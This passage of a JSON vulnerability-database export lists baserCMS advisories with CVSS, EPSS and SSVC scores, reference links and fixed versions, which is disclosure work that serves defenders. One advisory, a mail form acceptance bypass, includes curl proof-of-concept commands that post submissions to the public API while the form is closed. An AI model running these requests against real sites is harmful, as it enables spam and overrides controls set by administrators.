                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:50:30Z/"
                        }
                    ],
                    "url": "https://basercms.net/security/JVN_20837860"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/releases/tag/5.2.3",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:50:30Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/releases/tag/5.2.3"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-677c-xv24-crgx",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:50:30Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-677c-xv24-crgx"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32734",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32734"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-677c-xv24-crgx",
                    "reference_id": "GHSA-677c-xv24-crgx",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-677c-xv24-crgx"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/112578?format=api",
                    "purl": "pkg:composer/baserproject/basercms@5.2.3",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3"
                }
            ],
            "aliases": [
                "CVE-2026-32734",
                "GHSA-677c-xv24-crgx"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-8ssu-umet-37bk"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91316?format=api",
            "vulnerability_id": "VCID-d1sf-cmct-zbh1",
            "summary": "baserCMS has Mail Form Acceptance Bypass via Public API\n### Summary\nA public mail submission API allows unauthenticated users to submit mail form entries even when the corresponding form is not accepting submissions. This bypasses administrative controls intended to stop form intake and enables spam or abuse via the API.\n\n### Details\nIn baserCMS, mail form submissions through the front-end UI are guarded by acceptance checks implemented in `MailFrontService::isAccepting()`, which ensures that the mail form is currently accepting submissions (e.g. within its configured publish/acceptance window).\n\nThese checks are enforced in the UI flow handled by `MailController::index()` and `MailController::confirm()`  \n(e.g. `plugins/bc-mail/src/Controller/MailController.php`).\n\nHowever, the public API endpoint:\n\n`plugins/bc-mail/src/Controller/Api/MailMessagesController.php::add()`\n\ndoes not invoke `MailFrontService::isAccepting()` and does not verify whether the mail form is currently accepting submissions. As a result, the API accepts submissions regardless of the form’s acceptance state.\n\nThe endpoint does not require authentication. A valid CSRF cookie and token pair is sufficient to create a mail message. This allows submissions even when administrators intentionally disable or close the mail form via the admin UI.\n\n### PoC\n1. In the admin UI, configure a mail form so that it is **not accepting submissions** (e.g. outside its acceptance period or explicitly closed).\n2. Obtain a CSRF cookie by accessing the site root:\n```\ncurl -sS -D - -o - -c /tmp/basercms_cookies.txt 'http://localhost/'\n```\n3. 
Extract the CSRF token from the `csrfToken` cookie and submit a POST request to the public API endpoint:\n```\ncurl -sS -D - -o - -X POST 'http://localhost/baser/api/bc-mail/mail_messages/add/1.json' \\\n-H 'Content-Type: application/x-www-form-urlencoded' \\\n-H 'Referer: http://localhost/' \\\n-H 'X-CSRF-Token: <csrf-token-from-cookie>' \\\n-b /tmp/basercms_cookies.txt \\\n--data-urlencode 'name_1=Test' \\\n--data-urlencode 'name_2=User' \\\n--data-urlencode 'email_1=test@example.com' \\\n--data-urlencode 'email_2=test@example.com' \\\n--data-urlencode 'category[]=資料請求' \\\n--data-urlencode 'root=検索エンジン' \\\n--data-urlencode 'message=API bypass test'\n```\n4. The server responds with `200 OK` and creates a mail message, even though the form is configured to reject submissions.\n\n### Impact\nThis is an access control / business logic bypass vulnerability.\n\nAdministrators rely on the mail form acceptance settings to temporarily or permanently stop form intake (e.g. during maintenance, incidents, or spam attacks). This vulnerability allows attackers to bypass those controls via the public API, enabling unauthorized mail submissions, spam, and operational disruption. Any fix should make the API `add()` path enforce the same `MailFrontService::isAccepting()` check that the UI flow already applies.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30878",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0002",
                            "scoring_system": "epss",
                            "scoring_elements": "0.05615",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.0002",
                            "scoring_system": "epss",
                            "scoring_elements": "0.056",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30878"
                },
                {
                    "reference_url": "https://basercms.net/security/JVN_20837860",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:39:51Z/"
                        }
                    ],
                    "url": "https://basercms.net/security/JVN_20837860"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/releases/tag/5.2.3",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:39:51Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/releases/tag/5.2.3"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-8cr7-r8qw-gp3c",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:39:51Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-8cr7-r8qw-gp3c"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30878",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30878"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-8cr7-r8qw-gp3c",
                    "reference_id": "GHSA-8cr7-r8qw-gp3c",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-8cr7-r8qw-gp3c"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/112578?format=api",
                    "purl": "pkg:composer/baserproject/basercms@5.2.3",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3"
                }
            ],
            "aliases": [
                "CVE-2026-30878",
                "GHSA-8cr7-r8qw-gp3c"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-d1sf-cmct-zbh1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90792?format=api",
            "vulnerability_id": "VCID-k5qv-4yp3-zbgf",
            "summary": "baserCMS has an SQL injection vulnerability in its blog post functionality\nbaserCMS has a SQL injection vulnerability in blog posts.\n\n### Target\nbaserCMS 5.2.2 and earlier versions\n\n### Vulnerability\n\nMalicious SQL may be executed via the blog post functionality.\n\n### Countermeasures\nUpdate to baserCMS 5.2.3 or later.\n\nPlease refer to the following page for more information.\nhttps://basercms.net/security/JVN_52157568\n\n### Credits\n\nMirai Matsumoto@Future Secure Wave, Inc.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-27697",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00013",
                            "scoring_system": "epss",
                            "scoring_elements": "0.02103",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00013",
                            "scoring_system": "epss",
                            "scoring_elements": "0.02096",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-27697"
                },
                {
                    "reference_url": "https://basercms.net/security/JVN_20837860",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T15:27:51Z/"
                        }
                    ],
                    "url": "https://basercms.net/security/JVN_20837860"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/releases/tag/5.2.3",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T15:27:51Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/releases/tag/5.2.3"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-vh89-rjph-2g7p",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T15:27:51Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-vh89-rjph-2g7p"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27697",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27697"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-vh89-rjph-2g7p",
                    "reference_id": "GHSA-vh89-rjph-2g7p",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-vh89-rjph-2g7p"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/112578?format=api",
                    "purl": "pkg:composer/baserproject/basercms@5.2.3",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3"
                }
            ],
            "aliases": [
                "CVE-2026-27697",
                "GHSA-vh89-rjph-2g7p"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-k5qv-4yp3-zbgf"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/56066?format=api",
            "vulnerability_id": "VCID-khft-xvrw-g3dr",
            "summary": "baserCMS has a Cross-site Scripting (XSS) Vulnerability in HTTP 400 Bad Request\nXSS vulnerability in the HTTP 400 Bad Request response of baserCMS.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-46995",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0087",
                            "scoring_system": "epss",
                            "scoring_elements": "0.75586",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.0087",
                            "scoring_system": "epss",
                            "scoring_elements": "0.75582",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-46995"
                },
                {
                    "reference_url": "https://basercms.net/security/JVN_00876083",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://basercms.net/security/JVN_00876083"
                },
                {
                    "reference_url": "https://basercms.net/security/JVN_06274755",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:15Z/"
                        }
                    ],
                    "url": "https://basercms.net/security/JVN_06274755"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46995",
                    "reference_id": "CVE-2024-46995",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46995"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-mr7q-fv7j-jcgv",
                    "reference_id": "GHSA-mr7q-fv7j-jcgv",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-mr7q-fv7j-jcgv"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-mr7q-fv7j-jcgv",
                    "reference_id": "GHSA-mr7q-fv7j-jcgv",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:15Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-mr7q-fv7j-jcgv"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/83045?format=api",
                    "purl": "pkg:composer/baserproject/basercms@5.1.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-3new-f12y-8bf9"
                        },
                        {
                            "vulnerability": "VCID-4zw8-truk-pugf"
                        },
                        {
                            "vulnerability": "VCID-7x3n-4c2b-nfbx"
                        },
                        {
                            "vulnerability": "VCID-8buz-nsr9-3yge"
                        },
                        {
                            "vulnerability": "VCID-8ssu-umet-37bk"
                        },
                        {
                            "vulnerability": "VCID-d1sf-cmct-zbh1"
                        },
                        {
                            "vulnerability": "VCID-k5qv-4yp3-zbgf"
                        },
                        {
                            "vulnerability": "VCID-y2sz-c6vb-pkdp"
                        },
                        {
                            "vulnerability": "VCID-zqd4-rdem-jfgk"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2"
                }
            ],
            "aliases": [
                "CVE-2024-46995",
                "GHSA-mr7q-fv7j-jcgv"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-khft-xvrw-g3dr"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/56058?format=api",
            "vulnerability_id": "VCID-mfm9-gsh3-ubg8",
            "summary": "baserCMS has a Cross-site Scripting (XSS) Vulnerability in Blog posts Feature\nXSS vulnerability in the Blog posts feature of baserCMS.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-46996",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.01236",
                            "scoring_system": "epss",
                            "scoring_elements": "0.79576",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.01236",
                            "scoring_system": "epss",
                            "scoring_elements": "0.79581",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-46996"
                },
                {
                    "reference_url": "https://basercms.net/security/JVN_00876083",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N"
                        },
                        {
                            "value": "5.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:22:34Z/"
                        }
                    ],
                    "url": "https://basercms.net/security/JVN_00876083"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N"
                        },
                        {
                            "value": "5.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46996",
                    "reference_id": "CVE-2024-46996",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N"
                        },
                        {
                            "value": "5.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46996"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-66jv-qrm3-vvfg",
                    "reference_id": "GHSA-66jv-qrm3-vvfg",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-66jv-qrm3-vvfg"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-66jv-qrm3-vvfg",
                    "reference_id": "GHSA-66jv-qrm3-vvfg",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N"
                        },
                        {
                            "value": "5.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:22:34Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-66jv-qrm3-vvfg"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/83045?format=api",
                    "purl": "pkg:composer/baserproject/basercms@5.1.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-3new-f12y-8bf9"
                        },
                        {
                            "vulnerability": "VCID-4zw8-truk-pugf"
                        },
                        {
                            "vulnerability": "VCID-7x3n-4c2b-nfbx"
                        },
                        {
                            "vulnerability": "VCID-8buz-nsr9-3yge"
                        },
                        {
                            "vulnerability": "VCID-8ssu-umet-37bk"
                        },
                        {
                            "vulnerability": "VCID-d1sf-cmct-zbh1"
                        },
                        {
                            "vulnerability": "VCID-k5qv-4yp3-zbgf"
                        },
                        {
                            "vulnerability": "VCID-y2sz-c6vb-pkdp"
                        },
                        {
                            "vulnerability": "VCID-zqd4-rdem-jfgk"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2"
                }
            ],
            "aliases": [
                "CVE-2024-46996",
                "GHSA-66jv-qrm3-vvfg"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-mfm9-gsh3-ubg8"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/56065?format=api",
            "vulnerability_id": "VCID-p695-t9ye-v3ga",
            "summary": "baserCMS has a Cross-site Scripting (XSS) Vulnerability in Edit Email Form Settings Feature\nXSS vulnerability in the Edit Email Form Settings feature of baserCMS.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-46998",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.01064",
                            "scoring_system": "epss",
                            "scoring_elements": "0.78057",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.01064",
                            "scoring_system": "epss",
                            "scoring_elements": "0.7805",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-46998"
                },
                {
                    "reference_url": "https://basercms.net/security/JVN_00876083",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "5.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://basercms.net/security/JVN_00876083"
                },
                {
                    "reference_url": "https://basercms.net/security/JVN_98693329",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "5.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
